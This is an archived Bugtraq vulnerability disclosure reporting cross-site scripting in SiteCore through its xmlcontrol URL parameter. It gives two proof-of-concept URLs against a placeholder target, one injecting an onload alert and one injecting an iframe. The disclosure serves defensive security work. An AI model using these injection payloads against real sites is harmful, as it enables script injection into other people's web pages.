SiteCore XML Control Script Insertion

From: Mark Litchfield <mark@securatary.com>
To: bugtraq@securityfocus.com
Cc:
Subject: SiteCore XML Control Script Insertion
Date:


Hey All,

Sitecores \u201cspecial way\u201d of displaying XML Controls directly allows for a 
Cross Site Scripting Attack \u2013 more can be achieved with these XML 
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%20src=https://www.google.com/images/srpr/logo11w.png

More information can be found at 
http://www.securatary.com/vulnerabilities - Also listed is a useful text 
file for use with Burp when auditing SiteCore.






Copyright © 1995-2018 LinuxRocket.net. All rights reserved.